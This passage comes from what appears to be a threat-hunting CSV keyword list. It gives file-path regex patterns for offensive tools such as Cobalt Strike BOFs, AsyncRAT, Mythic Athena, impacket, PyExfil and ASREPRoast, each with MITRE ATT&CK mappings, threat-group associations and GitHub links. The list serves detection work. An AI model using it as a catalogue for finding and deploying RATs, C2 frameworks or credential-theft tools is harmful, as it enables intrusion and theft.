and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*/ASRenum.cs*",".{0,1000}\/ASRenum\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*/ASRenum-BOF*",".{0,1000}\/ASRenum\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*/ASREPRoast*",".{0,1000}\/ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*/asreproast_hashes_*.txt*",".{0,1000}\/asreproast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/ASREProastables.txt*",".{0,1000}\/ASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/assets/bin2uuids_file.py*",".{0,1000}\/assets\/bin2uuids_file\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/assets/wraith-scripts/*",".{0,1000}\/assets\/wraith\-scripts\/.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/AsyncRAT-C%23*",".{0,1000}\/AsyncRAT\-C\%23.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*/AsyncRAT-C-Sharp*",".{0,1000}\/AsyncRAT\-C\-Sharp.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*/asyncssh_server.py*",".{0,1000}\/asyncssh_server\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and 
server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*/atexec.py*",".{0,1000}\/atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/Athena-*.zip*",".{0,1000}\/Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.csproj*",".{0,1000}\/Athena\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.exe*",".{0,1000}\/Athena\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.Profiles.*.cs*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.Profiles.*.exe*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.Profiles.*.py*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.sln*",".{0,1000}\/Athena\.sln.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena/Assembly/*.*",".{0,1000}\/Athena\/Assembly\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena/Commands/*.*",".{0,1000}\/Athena\/Commands\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/athena/mythic*",".{0,1000}\/athena\/mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/athena_utils/*.py*",".{0,1000}\/athena_utils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AthenaPlugins/bin/*",".{0,1000}\/AthenaPlugins\/bin\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AthenaSMB/*",".{0,1000}\/AthenaSMB\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AthenaTests/*.*",".{0,1000}\/AthenaTests\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AtlasReaper.git*",".{0,1000}\/AtlasReaper\.git.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*/atomizer.py*",".{0,1000}\/atomizer\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","9","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/AtomLdr.git*",".{0,1000}\/AtomLdr\.git.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*/attackercan/*",".{0,1000}\/attackercan\/.{0,1000}","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/AttackerMITM.py*",".{0,1000}\/AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/attacks/*.py",".{0,1000}\/attacks\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/AttackServers/*",".{0,1000}\/AttackServers\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/AttackSurfaceMapper.git*",".{0,1000}\/AttackSurfaceMapper\.git.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*/AtYourService.exe*",".{0,1000}\/AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/audio/exfiltrator.py*",".{0,1000}\/audio\/exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/Augustus.git*",".{0,1000}\/Augustus\.git.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*/auth/cc2_auth.*",".{0,1000}\/auth\/cc2_auth\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/auth-owners.nse*",".{0,1000}\/auth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/auth-spoof.nse*",".{0,1000}\/auth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/autobloody.git*",".{0,1000}\/autobloody\.git.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*/autobloody/archive*",".{0,1000}\/autobloody\/archive.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*/AutoBypass.ps1*",".{0,1000}\/AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*/AutoRecon.git*",".{0,1000}\/AutoRecon\.git.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/AutoSmuggle.git*",".{0,1000}\/AutoSmuggle\.git.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*/AutoSUID.git*",".{0,1000}\/AutoSUID\.git.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/autotimeliner*",".{0,1000}\/autotimeliner.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - 